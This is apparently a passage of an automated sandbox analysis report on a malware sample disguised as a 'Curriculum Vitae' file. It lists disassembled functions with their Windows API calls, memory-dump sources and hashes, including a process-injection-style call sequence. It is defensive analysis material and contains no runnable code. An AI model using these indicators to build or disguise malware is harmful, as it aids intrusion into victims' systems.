                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Temp$FileNamePath
                      • String ID: aut
                      • API String ID: 3285503233-3010740371
                      • Opcode ID: c59f62e011449717d3d9bf990386c987eb70f375817854e4a91584d5a310fcfb
                      • Instruction ID: 9e90703f7ed87ca44374bdf2dd4cb7d7df3897707880b55850e709b0c1cac958
                      • Opcode Fuzzy Hash: c59f62e011449717d3d9bf990386c987eb70f375817854e4a91584d5a310fcfb
                      • Instruction Fuzzy Hash: E9D05E725003296BDA20E7A4AC0EFDB7A6CDB05750F0002A1B759E2191DAB0D984CAE4
                      Function 00DB7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00DB82F5
                      • TerminateProcess.KERNEL32(00000000), ref: 00DB82FC
                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00DB84DD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$CurrentFreeLibraryTerminate
                      • String ID:
                      • API String ID: 146820519-0
                      • Opcode ID: 4d71107a52e11b36b5d049376fcdbc03bc6e0da8dd5717fdf5982a524df0176d
                      • Instruction ID: 013b8906b6e8f82d0a1baac90f5974010794e484b7decfc263ccf236548379c2
                      • Opcode Fuzzy Hash: 4d71107a52e11b36b5d049376fcdbc03bc6e0da8dd5717fdf5982a524df0176d
                      • Instruction Fuzzy Hash: B8124A71908341DFC714DF28C484A6ABBE5FF89314F08895DE99A8B252DB31E945CFA2
                      Function 00DB9096 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$_strcat
                      • String ID:
                      • API String ID: 306214811-0
                      • Opcode ID: ff3a673edead7173302279eed2a893ac1b3ba68c742246b1ce26844525fb79c8
                      • Instruction ID: ce1abf9a1a80158b8de4d9c60fdaae10605e8424eb31180a9accd9d921117a4b
                      • Opcode Fuzzy Hash: ff3a673edead7173302279eed2a893ac1b3ba68c742246b1ce26844525fb79c8
                      • Instruction Fuzzy Hash: EAA16B31604605EFCB18DF58C5E19A9BBA1FF45314B6484ADE94A8F392DB31ED41CFA0
                      Function 00D65AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0c97f0f3cf6d67965fbe99adba55585db61c0c7484a6bb096ea1c2e3f4c5f426
                      • Instruction ID: c2a65fefb66af99912991fddb743b564d3bb4567240f31fa0c06f924e187569a
                      • Opcode Fuzzy Hash: 0c97f0f3cf6d67965fbe99adba55585db61c0c7484a6bb096ea1c2e3f4c5f426
                      • Instruction Fuzzy Hash: 5C51B171D0060AAFCF10DFA9E845FAEBBB8EF05310F190059F845AB299D7719981DB71
                      Function 00D310F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D31BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D31BF4
                        • Part of subcall function 00D31BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D31BFC
                        • Part of subcall function 00D31BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D31C07
                        • Part of subcall function 00D31BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D31C12
                        • Part of subcall function 00D31BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D31C1A
                        • Part of subcall function 00D31BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D31C22
                        • Part of subcall function 00D31B4A: RegisterWindowMessageW.USER32(00000004,?,00D312C4), ref: 00D31BA2
                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D3136A
                      • OleInitialize.OLE32 ref: 00D31388
                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00D724AB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                      • String ID:
                      • API String ID: 1986988660-0
                      • Opcode ID: 67a9d74a9a12ba7cc1596485cc3c6fc1051110f8aeca8ca189a3167162053e96
                      • Instruction ID: 0f7b701a99b28dda9103c81822bc7884ef9a977005b28d986cdecc4bb17e19e9
                      • Opcode Fuzzy Hash: 67a9d74a9a12ba7cc1596485cc3c6fc1051110f8aeca8ca189a3167162053e96
                      • Instruction Fuzzy Hash: A6718DB49113018FC388DF7AAC466553AE0FB8934475491AEE15AFF3B1EB3245898F61
                      Function 00D9C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D33923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D33A04
                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D9C259
                      • KillTimer.USER32(?,00000001,?,?), ref: 00D9C261
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D9C270
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: IconNotifyShell_Timer$Kill
                      • String ID:
                      • API String ID: 3500052701-0
                      • Opcode ID: d4c0dd42dcfad4e66b48a02c334a573bb4700fdf543c02d87d0178132016efed
                      • Instruction ID: 6f9b62d0e4e7e7eaf16dc06874ce4168c0f0e5d066d8c0e252edcbc3e2cea251
                      • Opcode Fuzzy Hash: d4c0dd42dcfad4e66b48a02c334a573bb4700fdf543c02d87d0178132016efed
                      • Instruction Fuzzy Hash: 4231C370914384AFEF228F648855BE7BBEC9B06308F04549ED6DEA7241C3746A88CB65
                      Function 00D686AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00D685CC,?,00DF8CC8,0000000C), ref: 00D68704
                      • GetLastError.KERNEL32(?,00D685CC,?,00DF8CC8,0000000C), ref: 00D6870E
                      • __dosmaperr.LIBCMT ref: 00D68739
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                      • String ID:
                      • API String ID: 490808831-0
                      • Opcode ID: 1f527c43e3eb480070d091a3f9d0107a161e87a95a96f8b05c100084336e126e
                      • Instruction ID: 4a331b9155555beab7029dc7f5cb80446b1abf92e2c4b7feb287d8ad4bc94651
                      • Opcode Fuzzy Hash: 1f527c43e3eb480070d091a3f9d0107a161e87a95a96f8b05c100084336e126e
                      • Instruction Fuzzy Hash: 3401D632A056602BD67463B4F845B7E67498B82B74F3D0319F958DB2E6DFA1CCC1A1B0
                      Function 00D3DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                      Download Yara Rule
                      APIs
                      • TranslateMessage.USER32(?), ref: 00D3DB7B
                      • DispatchMessageW.USER32(?), ref: 00D3DB89
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D3DB9F
                      • Sleep.KERNEL32(0000000A), ref: 00D3DBB1
                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00D81CC9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                      • String ID:
                      • API String ID: 3288985973-0
                      • Opcode ID: 393f101408bfa6aa73c424930eb7c320a6b89fed50a848a2f7be0133c77a211a
                      • Instruction ID: 8e4f1e30aacd686e30941391b282daefa0fd06bcc0cdb0269c64b7ec683f6278
                      • Opcode Fuzzy Hash: 393f101408bfa6aa73c424930eb7c320a6b89fed50a848a2f7be0133c77a211a
                      • Instruction Fuzzy Hash: ADF05E306543429BE734DB60DC89FAAB3BDEB84310F144A18E64AD71C0DB30A489CF35
                      Function 00DA2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00DA2CD4,?,?,?,00000004,00000001), ref: 00DA2FF2
                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00DA2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DA3006
                      • CloseHandle.KERNEL32(00000000,?,00DA2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DA300D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: File$CloseCreateHandleTime
                      • String ID:
                      • API String ID: 3397143404-0
                      • Opcode ID: 1ad926631ab40e4a131ef3861a0b2c3bc087e529325d09baffa5b0ac6dd17535
                      • Instruction ID: 0e44e1464353058ba25de71a443ba9ac3959b106e6f6294b3fbf6fcc837d0e2a
                      • Opcode Fuzzy Hash: 1ad926631ab40e4a131ef3861a0b2c3bc087e529325d09baffa5b0ac6dd17535
                      • Instruction Fuzzy Hash: 01E0863269031177D2311756BC0DF8B3A1CD786B71F144210F71DB51D046A0150142B8
                      Function 00D41310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                      Download Yara Rule
                      APIs
                      • __Init_thread_footer.LIBCMT ref: 00D417F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Init_thread_footer
                      • String ID: CALL
                      • API String ID: 1385522511-4196123274
                      • Opcode ID: 5402a5b1542ebcedabbd07735930d8590b30be06810a1df62e04c60171027dda
                      • Instruction ID: 522f9efbf915754bf492faa1af221680ffda7016c2cd28f0a0c272db487e4d5c
                      • Opcode Fuzzy Hash: 5402a5b1542ebcedabbd07735930d8590b30be06810a1df62e04c60171027dda
                      • Instruction Fuzzy Hash: F52279746083419FC714DF14C494A2ABBF1FF85314F28896DF49A8B3A2D771E885CBA2
                      Function 00DA6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                      Download Yara Rule
                      APIs
                      • _wcslen.LIBCMT ref: 00DA6F6B
                        • Part of subcall function 00D34ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34EFD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LibraryLoad_wcslen
                      • String ID: >>>AUTOIT SCRIPT<<<
                      • API String ID: 3312870042-2806939583
                      • Opcode ID: 15626f4db81b16ae381af40a36db2e2fddfb3f8b2c74c73e88914fe235f690c7
                      • Instruction ID: 4fc51914fb5dfce4939681884c0789bdf3e9148443296f298c0b15d703756397
                      • Opcode Fuzzy Hash: 15626f4db81b16ae381af40a36db2e2fddfb3f8b2c74c73e88914fe235f690c7
                      • Instruction Fuzzy Hash: 95B173712082019FCB14EF24C89196EB7E5FF95310F08895DF596972A2EB30ED49CBB2
                      Function 00D32DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                      Download Yara Rule
                      APIs
                      • GetOpenFileNameW.COMDLG32(?), ref: 00D72C8C
                        • Part of subcall function 00D33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D33A97,?,?,00D32E7F,?,?,?,00000000), ref: 00D33AC2
                        • Part of subcall function 00D32DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D32DC4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Name$Path$FileFullLongOpen
                      • String ID: X
                      • API String ID: 779396738-3081909835
                      • Opcode ID: 85ee02e00cac184ec9e4dcca6a1f528877ff39db92702bcf4daa29e3e5bf6b3c
                      • Instruction ID: a1263b58d3eb3f6e12b45c03013656a7ff2f039510684a2e8371481800deba99
                      • Opcode Fuzzy Hash: 85ee02e00cac184ec9e4dcca6a1f528877ff39db92702bcf4daa29e3e5bf6b3c
                      • Instruction Fuzzy Hash: 90218471A002989BDB41AF94C845BEE7BF8DF49304F008059E549B7341EBB496498BB1
                      Function 00DA2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: __fread_nolock
                      • String ID: EA06
                      • API String ID: 2638373210-3962188686
                      • Opcode ID: 7604a1c08119853560c4ef3ebe77dcbd68d6354ef4f783979d478bdc7b2ce5c1
                      • Instruction ID: 12095c81652fd7d1b07aefa340d470ec3a2371dec5078bd4aaecd08cdfc76577
                      • Opcode Fuzzy Hash: 7604a1c08119853560c4ef3ebe77dcbd68d6354ef4f783979d478bdc7b2ce5c1
                      • Instruction Fuzzy Hash: C501B572D042587EDF18D7A8C856EBEBBF8DB05301F00455AF592D6181E5B4E7088B70
                      Function 00D33837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                      Download Yara Rule
                      APIs
                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D33908
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: IconNotifyShell_
                      • String ID:
                      • API String ID: 1144537725-0
                      • Opcode ID: f939f9e8767775ef19babdc14b212a7a1b5fd79de99eeecdad87890f74fc0966
                      • Instruction ID: a7a415b10719eaf69f75e900e947a84dc004109351e8e50517f2c22cc97cf3bf
                      • Opcode Fuzzy Hash: f939f9e8767775ef19babdc14b212a7a1b5fd79de99eeecdad87890f74fc0966
                      • Instruction Fuzzy Hash: C831C170604301CFD720DF25D98479BBBE8FB49309F04096EF99997280E775AA48CBB2
                      Function 03BB129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03BB1A5B
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03BB1AF1
                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03BB1B13
                      Memory Dump Source
                      • Source File: 00000000.00000002.2111540426.0000000003BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3bb0000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                      • Instruction ID: 7fdd5728e5622cfdce6584a8e4a691d6da125a0aacac1078f11b5a196945abda
                      • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                      • Instruction Fuzzy Hash: 4D12BD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
                      Function 00D34ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D34E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D34EDD,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34E9C
                        • Part of subcall function 00D34E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D34EAE
                        • Part of subcall function 00D34E90: FreeLibrary.KERNEL32(00000000,?,?,00D34EDD,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34EC0
                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34EFD
                        • Part of subcall function 00D34E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D73CDE,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34E62
                        • Part of subcall function 00D34E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D34E74
                        • Part of subcall function 00D34E59: FreeLibrary.KERNEL32(00000000,?,?,00D73CDE,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34E87
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Library$Load$AddressFreeProc
                      • String ID:
                      • API String ID: 2632591731-0
                      • Opcode ID: 870fb522e5ff82064ac84c7339be74cc46fdd0459f487720901334008a3794b9
                      • Instruction ID: 1ed83889eb3b336cdc24ea89063f035715af3618bbc1a4aa3404847670aae5c1
                      • Opcode Fuzzy Hash: 870fb522e5ff82064ac84c7339be74cc46fdd0459f487720901334008a3794b9
                      • Instruction Fuzzy Hash: 8211C132610305AACB14AB64D812FAD77A5EF40711F14842DF546B61C1EE78EA459B70
                      Function 00DB9ABB Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 5ef06025957b1dd772b82189fc176be3996298bdd244680a52d1b792216f379d
                      • Instruction ID: 13902355f1448df0f1516e7df4959874b56843e40e23b544e78d930af319eb4e
                      • Opcode Fuzzy Hash: 5ef06025957b1dd772b82189fc176be3996298bdd244680a52d1b792216f379d
                      • Instruction Fuzzy Hash: 5C118836201215CFDB14DF19D4D0AD9F7A9EF89310B09816AEE4A8B351DB30AD41CBB5
                      Function 00D68402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
